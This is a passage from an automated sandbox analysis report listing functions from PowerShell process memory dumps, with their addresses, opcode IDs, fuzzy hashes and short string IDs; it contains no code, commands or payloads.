                                                                          • Instruction Fuzzy Hash: 28212B3090C74C8FDB59DB6C984A7E97FF0EB96320F04426FD048C3196D6749856CB91
                                                                          Function 00007FF848F133B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144949384.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                          • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45

                                                                          Non-executed Functions

                                                                          Function 00007FF848F18BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.2144949384.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_7ff848f10000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: N_^4$N_^7$N_^F$N_^J
                                                                          • API String ID: 0-3508309026
                                                                          • Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                          • Instruction ID: f6facd9be01d464781fe06f2e9dfce22635aafd9ed82b64586b0b92a0b284f4c
                                                                          • Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
                                                                          • Instruction Fuzzy Hash: 8E213B7761A0259ED3417BBDBC145DA3750EF942B8B4502B2D298CF143EA1C708686D5

                                                                          Executed Functions

                                                                          Function 00007FF84900660A Relevance: 6.7, Strings: 5, Instructions: 413COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B$I$(B$I$(B$I$(B$I$(B$I
                                                                          • API String ID: 0-3685135179
                                                                          • Opcode ID: f77356c9369f9636f3e9fca4f8c1399b969ac87a7b996e36827b35710925462a
                                                                          • Instruction ID: 253583669a614aa0ea03074e5a95689f315858f9a36a942faf36b4d5d8d4029c
                                                                          • Opcode Fuzzy Hash: f77356c9369f9636f3e9fca4f8c1399b969ac87a7b996e36827b35710925462a
                                                                          • Instruction Fuzzy Hash: C0C12331D0EACA5FEBA9EF2868156B57BE2FF15354F0402FAD40CD7093EA18E8018351
                                                                          Function 00007FF849006660 Relevance: 5.2, Strings: 4, Instructions: 240COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B$I$(B$I$(B$I$(B$I
                                                                          • API String ID: 0-2819540369
                                                                          • Opcode ID: 7ed70a4c73848386467aeb848f3967bad16a3d3ffec1bd2dc78c4130876564c7
                                                                          • Instruction ID: f843f279997a225aa9df6b4de001d210d0510e5d9f1ae44bcab1aa7ae5a5b67c
                                                                          • Opcode Fuzzy Hash: 7ed70a4c73848386467aeb848f3967bad16a3d3ffec1bd2dc78c4130876564c7
                                                                          • Instruction Fuzzy Hash: BB71E132D1EAC64FEBA9EF2864552347AE2EF15754F0802FAC44CEB183EA19EC458341
                                                                          Function 00007FF849004073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>$I
                                                                          • API String ID: 0-3301367642
                                                                          • Opcode ID: d91a0bcffdb92587be70c2d2802926d029be0ed3c71f0b2d39feeaaa3007b0e7
                                                                          • Instruction ID: 7260aea0d0d224c4cdac46254b432b1b3c74be00483c77076e0334f37b9a1efd
                                                                          • Opcode Fuzzy Hash: d91a0bcffdb92587be70c2d2802926d029be0ed3c71f0b2d39feeaaa3007b0e7
                                                                          • Instruction Fuzzy Hash: 7051F832E0DA864FEBA9EE2C64116B577E2EF55250F5801FAC00EC7193FE28EC158355
                                                                          Function 00007FF849004370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p>$I
                                                                          • API String ID: 0-2590420872
                                                                          • Opcode ID: a6cf8fe11d28ed46430500d694c5989996d75c23bcd71aca2c02770a3d491072
                                                                          • Instruction ID: 0584b4b0e5e9d2e1e96a1bddd725563722f0022b14499621d692300ff5db2a0f
                                                                          • Opcode Fuzzy Hash: a6cf8fe11d28ed46430500d694c5989996d75c23bcd71aca2c02770a3d491072
                                                                          • Instruction Fuzzy Hash: FB41E332E0DA894FEBA9EE2874116B577E1EF85760B0901FAC149C7193FA18EC158395
                                                                          Function 00007FF8490040BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>$I
                                                                          • API String ID: 0-3301367642
                                                                          • Opcode ID: 9781e0394f51bb5107959d54af4f522b9d2d6c433b47bb64028f8f51a2e21079
                                                                          • Instruction ID: 5879b468d04db35347dc145dc30549b5b6a5e097a8c7e4da56696f3187d8fee3
                                                                          • Opcode Fuzzy Hash: 9781e0394f51bb5107959d54af4f522b9d2d6c433b47bb64028f8f51a2e21079
                                                                          • Instruction Fuzzy Hash: 4A218032D0E9C74FEBB9EE1864511B576D1EF64290B5905FAC01EC71E3FE28DC548249
                                                                          Function 00007FF8490043BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229672668.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p>$I
                                                                          • API String ID: 0-2590420872
                                                                          • Opcode ID: 6b6fe11167621ac9cf85c359b2e612ebf097b7484c7647e3b0cdac3fb945fd89
                                                                          • Instruction ID: 540d444f10a144545ec63ddf014a6cb856b6152d768c689beac6378e7be73025
                                                                          • Opcode Fuzzy Hash: 6b6fe11167621ac9cf85c359b2e612ebf097b7484c7647e3b0cdac3fb945fd89
                                                                          • Instruction Fuzzy Hash: 47119A32E0E9C64FEBA8EE28A4505B877E0EF54260B4910FAD11DC71A3FA18EC148355
                                                                          Function 00007FF848F3A828 Relevance: .2, Instructions: 200COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7497d14700e25125830798e1d9991df59861dcab24f9e7599af20661fd653005
                                                                          • Instruction ID: 7f9ec6b1b0d6e6108e261254135d4b58570a662e1c877cbce39b50e2a1f31428
                                                                          • Opcode Fuzzy Hash: 7497d14700e25125830798e1d9991df59861dcab24f9e7599af20661fd653005
                                                                          • Instruction Fuzzy Hash: B851453190DB854FE70AEB28D8954A4BBE0FF16358B1801BFD489CB1D3EE16A847C716
                                                                          Function 00007FF848F39780 Relevance: .1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55235306a55f9d4665ab2105ba2f19f2c44d8f08ed806e43a03e11a01132721c
                                                                          • Instruction ID: 4df5ffc55489d78c0ba60ea8e316d104de4388140b2c64c4f5bd626dc45db611
                                                                          • Opcode Fuzzy Hash: 55235306a55f9d4665ab2105ba2f19f2c44d8f08ed806e43a03e11a01132721c
                                                                          • Instruction Fuzzy Hash: 39311A3191CB888FDB19DF1CAC066A97BF0FB96310F00426FE449C3692CA75A855CBC6
                                                                          Function 00007FF848E1EE20 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2228309292.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848e1d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6986538435dd7e8210cfc12c8f831aa6ed8abd6e6de9be7843165745162471d1
                                                                          • Instruction ID: dc08edb235b941e05a7f630abece9344cbc02606070c1eaddc0c46cf8439e1ed
                                                                          • Opcode Fuzzy Hash: 6986538435dd7e8210cfc12c8f831aa6ed8abd6e6de9be7843165745162471d1
                                                                          • Instruction Fuzzy Hash: 3D41E37180DBC54FE7969B2998419523FF0FF57360F1505EFE088CB1A3DA25A84AC7A2
                                                                          Function 00007FF848F3A73C Relevance: .1, Instructions: 111COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 229d44915abca2dabb1a969efe493c0ac76e2a60ebde8ff056b0bcfd4fec1b2a
                                                                          • Instruction ID: cdff9c2595ac00d36f75440630f1f72145b45c48874825746e9a76b2aa7110c7
                                                                          • Opcode Fuzzy Hash: 229d44915abca2dabb1a969efe493c0ac76e2a60ebde8ff056b0bcfd4fec1b2a
                                                                          • Instruction Fuzzy Hash: CB31277180EBC84FE716CB685C496B97FE4DF13220F0841EFD085CB0A3D669584AC761
                                                                          Function 00007FF848F333B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                          • Instruction ID: 1fde1e7c06bd8ad01fde8fdacf519f27676798cf7977af127a8e772823c5939c
                                                                          • Opcode Fuzzy Hash: 3e8110072008822f9b851662dbd92c3d0a0b45f8918f2b52d7721439382d7d88
                                                                          • Instruction Fuzzy Hash: 9501677111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                          Function 00007FF848F3A0FB Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6d63a6831ca54e350521d28d1b5e90fef133a81396abf51b19db8add2ee7bf4a
                                                                          • Instruction ID: 3c42ce584d4430eb4bc6933b6be2a5feea8373b12f605405dc3be592e00c8f06
                                                                          • Opcode Fuzzy Hash: 6d63a6831ca54e350521d28d1b5e90fef133a81396abf51b19db8add2ee7bf4a
                                                                          • Instruction Fuzzy Hash: 49F0F63790CE8C4FDB82FF2C98690E87FA0FF66215B0401ABD408C7161E7224948CBC2

                                                                          Non-executed Functions

                                                                          Function 00007FF848F38BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2229053854.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7ff848f30000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: L_^8$L_^<$L_^?$L_^J$L_^K$L_^N$L_^Q$L_^Y
                                                                          • API String ID: 0-1415242001
                                                                          • Opcode ID: 18246f1ced960f47f9313cb608ebcfae065cc244fd25530f79d916c2824cd461
                                                                          • Instruction ID: 208ff562fc9593e1c1eac2d9eee7fc3ebff388127ed0e92e8ac16a561240a24b
                                                                          • Opcode Fuzzy Hash: 18246f1ced960f47f9313cb608ebcfae065cc244fd25530f79d916c2824cd461
                                                                          • Instruction Fuzzy Hash: 882107736155159AC201376DB8415EE7790EF543B874552F3E218CF113DF2CA48B8A94

                                                                          Executed Functions

                                                                          Function 00007FF849016605 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2367469782.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B%I$(B%I$(B%I$(B%I$(B%I
                                                                          • API String ID: 0-1877043794
                                                                          • Opcode ID: c262d5d9cbf67b9c8829df628fa691b9c601e6e949b41ef1dd2b2f71f78be209
                                                                          • Instruction ID: f951ae029bb92a83474beee37de444be3ceebfd6a6215602cc3691ab7371d930
                                                                          • Opcode Fuzzy Hash: c262d5d9cbf67b9c8829df628fa691b9c601e6e949b41ef1dd2b2f71f78be209
                                                                          • Instruction Fuzzy Hash: 76D12332D0EACA9FEBA5EF2858165B5BBA0EF16354F0401BBD04DC7093EA1AEC45C351
                                                                          Function 00007FF849014073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2367469782.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>%I
                                                                          • API String ID: 0-3722309147
                                                                          • Opcode ID: a3728132266d19581d9dbe447d7eab99e197eca33636a83789a7dfbd300b2ec9
                                                                          • Instruction ID: fbd1dc7485937276eee8ce914e686f8e417cc39f5d8f2af23772161bb9571ac5
                                                                          • Opcode Fuzzy Hash: a3728132266d19581d9dbe447d7eab99e197eca33636a83789a7dfbd300b2ec9
                                                                          • Instruction Fuzzy Hash: 73510A32E1DAC68FEBA9EE2C541267577E1EF55360F5801BAC00EC71A3EE29EC058351
                                                                          Function 00007FF849014370 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2367469782.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p>%I
                                                                          • API String ID: 0-2206047945
                                                                          • Opcode ID: c55d907097f82827ced879c194b98ea934c31a8b6e7c727de67b8f23ef3c19f2
                                                                          • Instruction ID: 378f8e4036bebdabdde52a036ec7aedd87238310c9ec662158028aa7fe29742c
                                                                          • Opcode Fuzzy Hash: c55d907097f82827ced879c194b98ea934c31a8b6e7c727de67b8f23ef3c19f2
                                                                          • Instruction Fuzzy Hash: 2E411932E0DAC58FEBB5EE2C64126B577E1EF45760B0800BAC049C71A3EA19EC108395
                                                                          Function 00007FF8490140BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2367469782.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>%I
                                                                          • API String ID: 0-3722309147
                                                                          • Opcode ID: ade794f53c19e17fe03b6aed38d4a7eb1dd39d9f7141b5aac7c00bd1e58e937e
                                                                          • Instruction ID: f44cbd6a80452143397a5575db8b7aa0ccdb38001c1205f08e9d13dacde04f32
                                                                          • Opcode Fuzzy Hash: ade794f53c19e17fe03b6aed38d4a7eb1dd39d9f7141b5aac7c00bd1e58e937e
                                                                          • Instruction Fuzzy Hash: 8F21C132D0E9C78FEBB9EE2C545217576D1EF642A0B5905BAC01EC71F2EE29EC048342
                                                                          Function 00007FF8490143BC Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2367469782.00007FF849010000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849010000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff849010000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p>%I
                                                                          • API String ID: 0-2206047945
                                                                          • Opcode ID: 19cce567850930c77d133c019da16a746553a8128f9a1b39f6ea553180da6878
                                                                          • Instruction ID: 1494da495208532689d217cc9e4f83efaea71012ee56a10f6401692fa281d1f2
                                                                          • Opcode Fuzzy Hash: 19cce567850930c77d133c019da16a746553a8128f9a1b39f6ea553180da6878
                                                                          • Instruction Fuzzy Hash: E811C232D0E9C68FEBB5EF28A4525B877E0FF54360B4900B6D11DD71E6EA1AEC148351
                                                                          Function 00007FF848F49EF3 Relevance: .2, Instructions: 250COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2366569155.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9388b27e5bf96b6a32b08905982990e7acf318f77b98070b4bf766d79eac16a1
                                                                          • Instruction ID: 9b44077bcd79c13b6b7e38674b47d0142cadee17dd72dc68f813b360b02e330a
                                                                          • Opcode Fuzzy Hash: 9388b27e5bf96b6a32b08905982990e7acf318f77b98070b4bf766d79eac16a1
                                                                          • Instruction Fuzzy Hash: DB81B973D0D9D54FE742BB3CA8A60E57BA0FF6176CF0802F7C4884E093EE1968568659
                                                                          Function 00007FF848F49768 Relevance: .1, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2366569155.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f6650647c2379165f03ae975bcb007c32593097a5520e023ad3c6b188ab363e1
                                                                          • Instruction ID: a0476be7a853f9971a9e4657c2373e067f335eb2d7b51c95bed90a2575044ca2
                                                                          • Opcode Fuzzy Hash: f6650647c2379165f03ae975bcb007c32593097a5520e023ad3c6b188ab363e1
                                                                          • Instruction Fuzzy Hash: DD310A31A1CB488FDB58DF5CA80A6B97BE0FBA5710F10422FE449D3251DB74A856CBC2
                                                                          Function 00007FF848E2EB80 Relevance: .1, Instructions: 124COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2365638023.00007FF848E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E2D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff848e2d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 49d2d712dd1e7869b5ac7de3aca4ca975d9dac0e7409159313aa6d407f30e4a9
                                                                          • Instruction ID: 33b0710f8bfcdc217f26f598e54648ca8f9e1c074a121e7771cbedc73d08a21a
                                                                          • Opcode Fuzzy Hash: 49d2d712dd1e7869b5ac7de3aca4ca975d9dac0e7409159313aa6d407f30e4a9
                                                                          • Instruction Fuzzy Hash: 0241163180DBC59FE766AB2898519623FF0FF52364F1505EFD089CB1A3D725A806C792
                                                                          Function 00007FF848F4A47C Relevance: .1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2366569155.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 66a4550ca1b81f4ea47899e244cd3dd06839532f3287e9959b6b2bd1f3b15f32
                                                                          • Instruction ID: 3f49f181979198c851423f085fed163d8b9b5282863e3b7d668c16a6b477bb63
                                                                          • Opcode Fuzzy Hash: 66a4550ca1b81f4ea47899e244cd3dd06839532f3287e9959b6b2bd1f3b15f32
                                                                          • Instruction Fuzzy Hash: AB212B3190C74C8FDB59DB6C984A7E97FF0EBA6320F04416FD048C31A6D674945ACB91
                                                                          Function 00007FF848F433B5 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2366569155.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction ID: 8501ce2366aa47fe50c32cae5305b62a305da60d827aaf0f190e9b8a75457062
                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                          • Instruction Fuzzy Hash: 8B01447111CB0C4FD744EF0CE451AA5B7E0FB95364F10056EE58AC3695DB26E882CB45

                                                                          Non-executed Functions

                                                                          Function 00007FF848F48BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000008.00000002.2366569155.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_8_2_7ff848f40000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: K_^4$K_^7$K_^F$K_^J
                                                                          • API String ID: 0-377281160
                                                                          • Opcode ID: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                          • Instruction ID: bead706383397ff6f8c4a37cb53810d507c8abccd64b99c06fffeb200d3c1acc
                                                                          • Opcode Fuzzy Hash: 1337c1854dd59eb83ea9a8eb30e63dcf3290b25af5210be026440cbc330f0a7a
                                                                          • Instruction Fuzzy Hash: 11213B7761A525AED7417B7CB8045DA3BA0DF982B8B4503B3D198CF053EA1C708786D4

                                                                          Executed Functions

                                                                          Function 00007FF849006605 Relevance: 6.7, Strings: 5, Instructions: 430COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2539133043.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (B%I$(B%I$(B%I$(B%I$(B%I
                                                                          • API String ID: 0-1877043794
                                                                          • Opcode ID: 58327de4a068c59fa3bbfcaf1776b6c34e006191ede784434966d8b1cb9cf741
                                                                          • Instruction ID: 9e35f08bb3937bfad17d04ed8cebdf96f1d2876374cbde3472bc411af2d0f8b3
                                                                          • Opcode Fuzzy Hash: 58327de4a068c59fa3bbfcaf1776b6c34e006191ede784434966d8b1cb9cf741
                                                                          • Instruction Fuzzy Hash: 28C13432D0EACA5FEBA5AF2868155B5BBE2FF15354F0802FAD04DD7093EA18E845C351
                                                                          Function 00007FF849004073 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2539133043.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>%I
                                                                          • API String ID: 0-3722309147
                                                                          • Opcode ID: 061d1d2bf0f284dbdf40b839d382ab8ba66f00fa940265eb85d331f9046f85cd
                                                                          • Instruction ID: 00353a3a617ec554abb62357d877b344db2d21a613f6c41bc8b0b6436ebb355d
                                                                          • Opcode Fuzzy Hash: 061d1d2bf0f284dbdf40b839d382ab8ba66f00fa940265eb85d331f9046f85cd
                                                                          • Instruction Fuzzy Hash: 9F512A32E0DA864FEBA9EE1C64116B577E1EF54250F5801FAC04EC7193FE28EC158349
                                                                          Function 00007FF8490040BF Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000A.00000002.2539133043.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_10_2_7ff849000000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 8>%I
                                                                          • API String ID: 0-3722309147
                                                                          • Opcode ID: 0eb8aa092bb0df4fa87968e2aa87caefbfb59355005d5a66b8b58d171ec741f6
                                                                          • Instruction ID: 8861859fd2f596ce36bcab89452ba81eff82683f0031a8ae2f9e64e72ad37191
                                                                          • Opcode Fuzzy Hash: 0eb8aa092bb0df4fa87968e2aa87caefbfb59355005d5a66b8b58d171ec741f6
                                                                          • Instruction Fuzzy Hash: 9721BF32E1D9874FEBB9EE1864501B476D6EF64290B4901F9C05EC71E3FE28EC148349
                                                                          Function 00007FF848F39780 Relevance: .1, Instructions: 129COMMON
                                                                          Download Yara Rule
